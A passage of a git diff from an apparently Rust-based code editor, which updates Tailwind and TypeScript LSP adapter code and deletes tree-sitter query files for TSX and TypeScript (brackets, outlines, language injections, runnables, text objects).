true, @@ -196,11 +197,8 @@ impl LspAdapter for TailwindLspAdapter { "typescriptreact".to_string(), ), (LanguageName::new_static("Svelte"), "svelte".to_string()), - ( - LanguageName::new_static("Elixir"), - "phoenix-heex".to_string(), - ), - (LanguageName::new_static("HEEX"), "phoenix-heex".to_string()), + (LanguageName::new_static("Elixir"), "elixir".to_string()), + (LanguageName::new_static("HEEx"), "heex".to_string()), (LanguageName::new_static("ERB"), "erb".to_string()), (LanguageName::new_static("HTML+ERB"), "erb".to_string()), (LanguageName::new_static("PHP"), "php".to_string()), diff --git a/crates/languages/src/tailwindcss.rs b/crates/languages/src/tailwindcss.rs index 016c2956591a5140ab4b2d8313711382fee47d30..aa310fac3f57477b9c0ef85f24f51e619a893c87 100644 --- a/crates/languages/src/tailwindcss.rs +++ b/crates/languages/src/tailwindcss.rs @@ -135,6 +135,7 @@ impl LspAdapter for TailwindCssLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": true diff --git a/crates/languages/src/tsx/brackets.scm b/crates/languages/src/tsx/brackets.scm deleted file mode 100644 index 0e98b78036b4b19fd63d812fa92d2416788764f4..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/brackets.scm +++ /dev/null @@ -1,11 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -("<" @open "/>" @close) -("" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) - -((jsx_element (jsx_opening_element) @open (jsx_closing_element) @close) (#set! newline.only) (#set! rainbow.exclude)) diff --git a/crates/languages/src/tsx/debugger.scm b/crates/languages/src/tsx/debugger.scm deleted file mode 100644 index 3e73dc839e4e5fc5ccc1654e96b327bc8181a2e8..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/debugger.scm +++ /dev/null @@ -1,25 +0,0 @@ -(lexical_declaration (variable_declarator name: (identifier) @debug-variable)) - -(for_in_statement left: (identifier) @debug-variable) -(for_statement initializer: (lexical_declaration (variable_declarator name: (identifier) @debug-variable))) - -(binary_expression left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_expression right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(unary_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(update_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(jsx_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(array (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(pair value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(member_expression object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(statement_block) @debug-scope -(program) @debug-scope diff --git a/crates/languages/src/tsx/imports.scm b/crates/languages/src/tsx/imports.scm deleted file mode 100644 index e26b97aeef9cb62395e7030f3173208d79187bd6..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/imports.scm +++ /dev/null @@ -1,14 +0,0 @@ -(import_statement - import_clause: (import_clause - [ - (identifier) @name - (named_imports - (import_specifier - name: (_) @name - alias: (_)? @alias)) - ]) - source: (string (string_fragment) @source)) @import - -(import_statement - !import_clause - source: (string (string_fragment) @source @wildcard)) @import diff --git a/crates/languages/src/tsx/indents.scm b/crates/languages/src/tsx/indents.scm deleted file mode 100644 index 9897f3060eaf37891cf4563cebc93345112422f8..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/indents.scm +++ /dev/null @@ -1,21 +0,0 @@ -[ - (call_expression) - (assignment_expression) - (member_expression) - (lexical_declaration) - (variable_declaration) - (assignment_expression) - (if_statement) - (for_statement) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent - -(jsx_opening_element ">" @end) @indent - -(jsx_element - (jsx_opening_element) @start - (jsx_closing_element)? @end) @indent diff --git a/crates/languages/src/tsx/injections.scm b/crates/languages/src/tsx/injections.scm deleted file mode 100644 index 2cf3ea69ca2fd95402eba6fadb85f3505c5562b7..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/injections.scm +++ /dev/null @@ -1,128 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -(((comment) @_jsdoc_comment - (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content - (#set! injection.language "jsdoc")) - -((regex) @injection.content - (#set! injection.language "regex")) - -(call_expression - function: (identifier) @_name (#eq? @_name "css") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (member_expression - object: (identifier) @_obj (#eq? @_obj "styled") - property: (property_identifier)) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (call_expression - function: (identifier) @_name (#eq? @_name "styled")) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "html") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "html")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "js") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "javascript")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "json") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "json")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "sql") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "sql")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "ts") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "typescript")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^ya?ml$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "yaml")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "graphql")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "graphql"))) -) - -(call_expression - function: (identifier) @_name(#match? @_name "^iso$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "isograph"))) -) - -; Parse the contents of strings and tagged template -; literals with leading ECMAScript comments: -; '/* html */' or '/*html*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") - (#set! injection.language "html") -) - -; '/* sql */' or '/*sql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") - (#set! injection.language "sql") -) - -; '/* gql */' or '/*gql*/' -; '/* graphql */' or '/*graphql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") - (#set! injection.language "graphql") -) - -; '/* css */' or '/*css*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") - (#set! injection.language "css") -) diff --git a/crates/languages/src/tsx/outline.scm b/crates/languages/src/tsx/outline.scm deleted file mode 100644 index 54d29007c7b7eb57c0bcaefc2c1e0ab75e4d9a6c..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/outline.scm +++ /dev/null @@ -1,230 +0,0 @@ -(internal_module - "namespace" @context - name: (_) @name) @item - -(enum_declaration - "enum" @context - name: (_) @name) @item - -(type_alias_declaration - "type" @context - name: (_) @name) @item - -(function_declaration - "async"? @context - "function" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(generator_function_declaration - "async"? @context - "function" @context - "*" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(interface_declaration - "interface" @context - name: (_) @name) @item - -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Exported array destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Exported object destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Top-level array destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Top-level object destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(class_declaration - "class" @context - name: (_) @name) @item - -(abstract_class_declaration - "abstract" @context - "class" @context - name: (_) @name) @item - -; Method definitions in classes (not in object literals) -(class_body - (method_definition - [ - "get" - "set" - "async" - "*" - "readonly" - "static" - (override_modifier) - (accessibility_modifier) - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item) - -; Object literal methods -(variable_declarator - value: (object - (method_definition - [ - "get" - "set" - "async" - "*" - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item)) - -(public_field_definition - [ - "declare" - "readonly" - "abstract" - "static" - (accessibility_modifier) - ]* @context - name: (_) @name) @item - -; Add support for (node:test, bun:test and Jest) runnable -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] @context - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Object properties -(pair - key: [ - (property_identifier) @name - (string (string_fragment) @name) - (number) @name - (computed_property_name) @name - ]) @item - - -; Nested variables in function bodies -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Nested array destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Nested object destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern value: (identifier) @name @item) - (pair_pattern value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(comment) @annotation diff --git a/crates/languages/src/tsx/runnables.scm b/crates/languages/src/tsx/runnables.scm deleted file mode 100644 index 85702cf99d9968b29f9375bfd8215ecba53f2eb5..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/runnables.scm +++ /dev/null @@ -1,46 +0,0 @@ -; Add support for (node:test, bun:test and Jest) runnable -; Function expression that has `it`, `test` or `describe` as the function name -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) diff --git a/crates/languages/src/tsx/textobjects.scm b/crates/languages/src/tsx/textobjects.scm deleted file mode 100644 index 628a921f3ac9ea04ff59654d72caf73cebbc9071..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/textobjects.scm +++ /dev/null @@ -1,113 +0,0 @@ -(comment)+ @comment.around - -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_definition - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(function_expression - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -((arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")) @function.around - (#not-has-parent? @function.around variable_declarator)) - -; Arrow function in variable declaration - capture the full declaration -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) -]) @function.around - -; Arrow function in variable declaration (expression body fallback) -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) -]) @function.around - -; Catch-all for arrow functions in other contexts (callbacks, etc.) -((arrow_function - body: (_) @function.inside) @function.around - (#not-has-parent? @function.around variable_declarator)) -(function_signature) @function.around - -(generator_function - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(generator_function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(class_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(class - body: (_ - "{" - (_)* @class.inside - "}" )) @class.around - -(interface_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(enum_declaration - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(ambient_declaration - (module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" ))) @class.around - -(internal_module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(type_alias_declaration) @class.around diff --git a/crates/languages/src/typescript.rs b/crates/languages/src/typescript.rs index 2b2fb19c629f85c6b51eba64d154b43e716f6827..714191ace093aa4c592316692dae3db0cdc24223 100644 --- a/crates/languages/src/typescript.rs +++ b/crates/languages/src/typescript.rs @@ -3,11 +3,11 @@ use async_trait::async_trait; use chrono::{DateTime, Local}; use collections::HashMap; use futures::future::join_all; -use gpui::{App, AppContext, AsyncApp, Task}; +use gpui::{App, AppContext, AsyncApp, Entity, Task}; use itertools::Itertools as _; use language::{ - ContextLocation, ContextProvider, File, LanguageName, LanguageToolchainStore, LspAdapter, - LspAdapterDelegate, LspInstaller, Toolchain, + Buffer, ContextLocation, ContextProvider, File, LanguageName, LanguageToolchainStore, + LspAdapter, LspAdapterDelegate, LspInstaller, Toolchain, }; use lsp::{CodeActionKind, LanguageServerBinary, LanguageServerName, Uri}; use node_runtime::{NodeRuntime, VersionStrategy}; @@ -425,10 +425,11 @@ async fn detect_package_manager( impl ContextProvider for TypeScriptContextProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> Task> { - let Some(file) = project::File::from_dyn(file.as_ref()).cloned() else { + let file = buffer.and_then(|buffer| buffer.read(cx).file()); + let Some(file) = project::File::from_dyn(file).cloned() else { return Task::ready(None); }; let Some(worktree_root) = file.worktree.read(cx).root_dir() else { @@ -804,6 +805,7 @@ impl LspAdapter for TypeScriptLspAdapter { async fn initialization_options( self: Arc, adapter: &Arc, + _: &mut AsyncApp, ) -> Result> { let tsdk_path = self.tsdk_path(adapter).await; Ok(Some(json!({ diff --git a/crates/languages/src/typescript/brackets.scm b/crates/languages/src/typescript/brackets.scm deleted file mode 100644 index 635233849142d8951edeca02ca0c79253aa91e80..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/brackets.scm +++ /dev/null @@ -1,7 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/typescript/debugger.scm b/crates/languages/src/typescript/debugger.scm deleted file mode 100644 index a99f194a4a4130210b47f8170fca039acc163411..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/debugger.scm +++ /dev/null @@ -1,23 +0,0 @@ -(lexical_declaration (variable_declarator name: (identifier) @debug-variable)) - -(for_in_statement left: (identifier) @debug-variable) -(for_statement initializer: (lexical_declaration (variable_declarator name: (identifier) @debug-variable))) - -(binary_expression left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_expression right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(unary_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(update_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(array (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(pair value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(member_expression object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(statement_block) @debug-scope -(program) @debug-scope diff --git a/crates/languages/src/typescript/imports.scm b/crates/languages/src/typescript/imports.scm deleted file mode 100644 index 68ca25b2c15b7e312edbc3eeb9b2f0e493ca2d6f..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/imports.scm +++ /dev/null @@ -1,20 +0,0 @@ -(import_statement - import_clause: (import_clause - [ - (identifier) @name - (named_imports - (import_specifier - name: (_) @name - alias: (_)? @alias)) - (namespace_import) @wildcard - ]) - source: (string (string_fragment) @source)) @import - -(import_statement - !source - import_clause: (import_require_clause - source: (string (string_fragment) @source))) @wildcard @import - -(import_statement - !import_clause - source: (string (string_fragment) @source)) @wildcard @import diff --git a/crates/languages/src/typescript/indents.scm b/crates/languages/src/typescript/indents.scm deleted file mode 100644 index b4ac50bf5ac0bf1871523cabc9ee3683a28cd0f3..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/indents.scm +++ /dev/null @@ -1,17 +0,0 @@ -[ - (call_expression) - (assignment_expression) - (member_expression) - (lexical_declaration) - (variable_declaration) - (assignment_expression) - ; below handled by `(_ "{" "}" @end) @indent` - ; (if_statement) - ; (for_statement) - ; (while_statement) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent diff --git a/crates/languages/src/typescript/injections.scm b/crates/languages/src/typescript/injections.scm deleted file mode 100644 index 91880407900e7407e46982a54dbeaa3e30277bdd..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/injections.scm +++ /dev/null @@ -1,169 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -(((comment) @_jsdoc_comment - (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content - (#set! injection.language "jsdoc")) - -(((comment) @_reference - (#match? @_reference "^///\\s+\\s*$")) @injection.content - (#set! injection.language "html")) - -((regex) @injection.content - (#set! injection.language "regex")) - -(call_expression - function: (identifier) @_name (#eq? @_name "css") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (member_expression - object: (identifier) @_obj (#eq? @_obj "styled") - property: (property_identifier)) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (call_expression - function: (identifier) @_name (#eq? @_name "styled")) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "html") - arguments: (template_string) @injection.content - (#set! injection.language "html") -) - -(call_expression - function: (identifier) @_name (#eq? @_name "js") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "javascript")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "json") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "json")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "sql") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "sql")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "ts") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "typescript")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^ya?ml$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "yaml")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "graphql")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "graphql"))) -) - -(call_expression - function: (identifier) @_name(#match? @_name "^iso$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "isograph"))) -) - -;; Angular Component template injection -(call_expression - function: [ - (identifier) @_decorator (#eq? @_decorator "Component") - (member_expression property: (property_identifier) @_decorator (#eq? @_decorator "Component")) - ] - arguments: (arguments (object - (pair - key: (property_identifier) @_prop (#eq? @_prop "template") - value: [ - (string) @injection.content - (template_string) @injection.content - (template_string (string_fragment) @injection.content) - ] - ))) - (#set! injection.language "angular")) - -;; Angular Component styles injection -(call_expression - function: [ - (identifier) @_decorator (#eq? @_decorator "Component") - (member_expression property: (property_identifier) @_decorator (#eq? @_decorator "Component")) - ] - arguments: (arguments (object - (pair - key: (property_identifier) @_prop (#eq? @_prop "styles") - value: [ - (string) @injection.content - (template_string) @injection.content - (template_string (string_fragment) @injection.content) - (array (string) @injection.content) - (array (template_string) @injection.content) - (array (template_string (string_fragment)) @injection.content) - ] - ))) - (#set! injection.language "css")) - -; Parse the contents of strings and tagged template -; literals with leading ECMAScript comments: -; '/* html */' or '/*html*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") - (#set! injection.language "html") -) - -; '/* sql */' or '/*sql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") - (#set! injection.language "sql") -) - -; '/* gql */' or '/*gql*/' -; '/* graphql */' or '/*graphql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") - (#set! injection.language "graphql") -) - -; '/* css */' or '/*css*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") - (#set! injection.language "css") -) diff --git a/crates/languages/src/typescript/outline.scm b/crates/languages/src/typescript/outline.scm deleted file mode 100644 index 54d29007c7b7eb57c0bcaefc2c1e0ab75e4d9a6c..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/outline.scm +++ /dev/null @@ -1,230 +0,0 @@ -(internal_module - "namespace" @context - name: (_) @name) @item - -(enum_declaration - "enum" @context - name: (_) @name) @item - -(type_alias_declaration - "type" @context - name: (_) @name) @item - -(function_declaration - "async"? @context - "function" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(generator_function_declaration - "async"? @context - "function" @context - "*" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(interface_declaration - "interface" @context - name: (_) @name) @item - -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Exported array destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Exported object destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Top-level array destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Top-level object destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(class_declaration - "class" @context - name: (_) @name) @item - -(abstract_class_declaration - "abstract" @context - "class" @context - name: (_) @name) @item - -; Method definitions in classes (not in object literals) -(class_body - (method_definition - [ - "get" - "set" - "async" - "*" - "readonly" - "static" - (override_modifier) - (accessibility_modifier) - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item) - -; Object literal methods -(variable_declarator - value: (object - (method_definition - [ - "get" - "set" - "async" - "*" - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item)) - -(public_field_definition - [ - "declare" - "readonly" - "abstract" - "static" - (accessibility_modifier) - ]* @context - name: (_) @name) @item - -; Add support for (node:test, bun:test and Jest) runnable -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] @context - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Object properties -(pair - key: [ - (property_identifier) @name - (string (string_fragment) @name) - (number) @name - (computed_property_name) @name - ]) @item - - -; Nested variables in function bodies -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Nested array destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Nested object destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern value: (identifier) @name @item) - (pair_pattern value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(comment) @annotation diff --git a/crates/languages/src/typescript/overrides.scm b/crates/languages/src/typescript/overrides.scm deleted file mode 100644 index 8f437a1424af06aa4855aac67511926181977936..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/overrides.scm +++ /dev/null @@ -1,9 +0,0 @@ -(comment) @comment.inclusive - -(string) @string - -(template_string (string_fragment) @string) - -(_ value: (call_expression - function: (identifier) @function_name_before_type_arguments - type_arguments: (type_arguments))) diff --git a/crates/languages/src/typescript/runnables.scm b/crates/languages/src/typescript/runnables.scm deleted file mode 100644 index 6bfc53632910ce8212f739d310e3d560d05cffc1..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/runnables.scm +++ /dev/null @@ -1,85 +0,0 @@ -; Add support for (node:test, bun:test, Jest and Deno.test) runnable -; Function expression that has `it`, `test` or `describe` as the function name -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for Deno.test with string names -( - (call_expression - function: (member_expression - object: (identifier) @_namespace - property: (property_identifier) @_method - ) - (#eq? @_namespace "Deno") - (#eq? @_method "test") - arguments: ( - arguments . [ - (string (string_fragment) @run @DENO_TEST_NAME) - (identifier) @run @DENO_TEST_NAME - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for Deno.test with named function 